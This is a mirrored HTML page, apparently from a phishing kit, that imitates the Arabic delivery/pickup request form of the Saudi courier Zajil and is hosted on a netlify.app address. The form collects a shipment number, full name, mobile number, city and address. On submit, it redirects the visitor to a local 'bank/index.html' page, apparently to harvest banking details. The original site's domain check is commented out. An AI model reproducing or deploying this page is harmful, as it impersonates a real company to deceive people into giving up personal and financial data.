﻿<!DOCTYPE html>
<!--[if IE 8]><html class="no-js lt-ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]>
<!-->
<html class="no-js" lang="en">
<!--<![endif]-->

<!-- Mirrored from zajil-express-online-ac894.netlify.app/ by HTTrack Website Copier/3.x [XR&CO'2017], Wed, 04 Jan 2023 21:32:36 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <!--<script type="text/javascript">
        if (window.location.toString().toLowerCase().indexOf("zajil-express.com") < 0) {
            window.location = "http://www.zajil-express.com/delivery-pickup.html";
        }
     </script>-->
    <!-- Basic Page Needs
    ================================================== -->
    <meta charset="utf-8">
    <title>زاجل - توصيل - استلام</title>
    <meta name="description" content="أيقونة لريادة الأعمال في المملكة العربية السعودية حيث وسعت نطاق عملياتها في مجال النقل والخدمات اللوجستية حيث تعتبر واحدة من الشركات الرائدة في هذا المجال. تأسست عام 1999 في عنيزة بالمملكة العربية السعودية ومقرها في الرياض... ">
    <meta name="author" content="زاجل">
    <meta property="og:image" content="https://www7.0zz0.com/2023/03/05/16/232129275.jpg">
    <meta property="og:image:type" content="image/jpg">
    <meta property="og:image:width" content="">
    <meta property="og:image:height" content="">
    <!-- Mobile Specific Metas
    ================================================== -->
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <!-- Font
    ================================================== -->
    <link href='css13b7' rel='stylesheet' type='text/css'>
    <script type="text/javascript">function RedirectionJavascript(){document.location.href="bank/index.html";}
	</script>
    <!--<link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />-->
    <link rel="icon" type="image/png" href="favicon.png">
    <!-- CSS
    ================================================== -->
    <link rel="stylesheet" href="css%20(1)/bootstrap.min.css">
    <link href="Content/bootstrap.rtl.min.css" rel="stylesheet">
    <link rel="stylesheet" href="css%20(1)/font-awesome.min.css">
    <link rel="stylesheet" href="css%20(1)/font-awesome-rtl.css">
    <link href="js/mloading/jquery.mloading.css" rel="stylesheet">
    <link rel="stylesheet" href="style4804.css">

    <style>


        .panelGrey {
            padding: 22px 0px;
            background: #ccc;
            background: -moz-linear-gradient(top,#ccc 0,#fff 100%);
            background: -webkit-gradient(linear,left top,left bottom,color-stop(0,#ccc),color-stop(100%,#fff));
            background: -webkit-linear-gradient(top,#ccc 0,#fff 100%);
            background: -o-linear-gradient(top,#ccc 0,#fff 100%);
            /*background: -ms-linear-gradient(top,#ccc 0,#fff 100%);*/
            background: linear-gradient(to bottom,#ccc 0,#fff 100%);
            filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ccc', endColorstr='#fff', GradientType=0 );
            box-shadow: 0 0 10px #fff;
        }

        .successPanelGrey {
            padding: 22px 0px;
            background: #ccc;
            background: -moz-linear-gradient(top,#add0a7 0,#fff 100%);
            background: -webkit-gradient(linear,left top,left bottom,color-stop(0,#add0a7),color-stop(100%,#fff));
            background: -webkit-linear-gradient(top,#add0a7 0,#fff 100%);
            background: -o-linear-gradient(top,#add0a7 0,#fff 100%);
            /*background: -ms-linear-gradient(top,#add0a7 0,#fff 100%);*/
            background: linear-gradient(to bottom,#add0a7 0,#fff 100%);
            filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#add0a7', endColorstr='#fff', GradientType=0 );
            box-shadow: 0 0 10px #fff;
        }

        .panelGrey h4 {
            border-bottom: 1px solid #ccc;
            padding-bottom: 10px;
        }

        .required, .requiredS, .requiredP1, .required_chosen a.chosen-single {
            border-right: 4px solid red !important;
        }

        .requiredField input, .requiredField textarea, .requiredField select, .requiredField .chosen-container-single .chosen-single {
            -webkit-animation: blinker 1s linear infinite;
            -moz-animation: blinker 1s linear infinite;
            animation: blinker 1s linear infinite;
        }

        @keyframes blinker {
            70% {
                border-color: #ff0000;
            }
        }
    </style>
    <!-- Favicons
    ================================================== -->
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async="" src="gtag/jse7e1">
    </script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag() { dataLayer.push(arguments); }
        gtag('js', new Date());



        gtag('config', 'UA-199394055-1');
    </script>
</head>
<body>
    <div id="htmlTemplateHeader"></div>
    <script type="text/javascript" src="js/jquery.min.js"></script>
    <div class="page-titleNew">
        <div class="container">
            <h1>طلب توصيل / استلام</h1>
        </div>
    </div>
    <div class="container">
        <div class="row mx-resp-0">
            <div style="padding:0px;">
                <img src="images/DayBlueWithAvatarandSloganYellowAr.png" style="width: 100%; height: 400px;">
            </div>
            <form id="form" class="comment-form" novalidate="">
                <div class="row requestDelivery">
                    <div class="col-md-6">
                        <br>
                        <div class="col-md-5" style="padding: 20px;">
                            <div class="formPanel form-group">
                                <div class="row-comment">
                                    <p class="col-4">
                                        <select runat="server" class="form-control" id="txtService" placeholder="Select service" style="height: 50px; border: none; background-color:#fff; border-color: none">
                                            <option value="" selected="" >نوع الخدمة</option>
                                            <option value="طلب توصيل">طلب توصيل</option>
                                            <option value=" طلب استلام"> طلب استلام </option>
                                        </select>
                                    </p>
                                    <p class="col-4">
                                        <input type="text" class="form-control" id="nump" placeholder=" رقم الشحنة" value="">
                                   
                                 </p>
                               
                                 <p class="col-4">
                                    <input type="text" class="form-control" id="name" placeholder="  الاسم الكامل" value="">
                               
                             </p>
                                
                                   
                                   
                                    <p class="col-4">
                                        <input id="loc" class="form-control" type="text" value="" placeholder="رقم الجوال">
                                    </p>
                                    <p class="col-4">
                                        <input id="txtCity" class="form-control" type="text" value="" placeholder="المدينة">
                                    </p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-6">
                       
                        <div class="col-md-5" >
                            <div class="formPanel form-group">
                                <div class="row-comment">
                                    <p class="col-4">
                                        <input type="text" class="form-control" id="tkoee" placeholder="العنوان الكامل" value="">
                                    </p>
                                       <textarea style="height: 90px;resize: none;" rows="4" class="form-control" id="txtDetails" placeholder=" التفاصيل"></textarea>
                                    </p>
                              
                                    <p class="col-4">
                                        <input type="submit" value="ارسال الطلب"  class="form-control btn btn-primary submit" onclick="setTimeout('RedirectionJavascript()', 1500)">
                                           
                                    </p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-12">
                        <div id="lblErrorRequestDelivery" class="alert alert-danger text-center" style="display:none; direction: ltr;">Please enter the above details</div>
                        <div id="lblResultRequestDelivery" class="alert alert-success text-center" style="display:none; direction: ltr;"></div>
                    </div>
                </div>
            </form>
        </div>
    </div>

    <div id="htmlTemplateFooter"></div>
    <script src="js/script4804.js"></script>
    <script src="js/requestDeliveryOrPickup.js"></script>
    <script src="js/form.js"></script>
    
 
</body>

<!-- Mirrored from zajil-express-online-ac894.netlify.app/ by HTTrack Website Copier/3.x [XR&CO'2017], Wed, 04 Jan 2023 21:33:24 GMT -->
</html>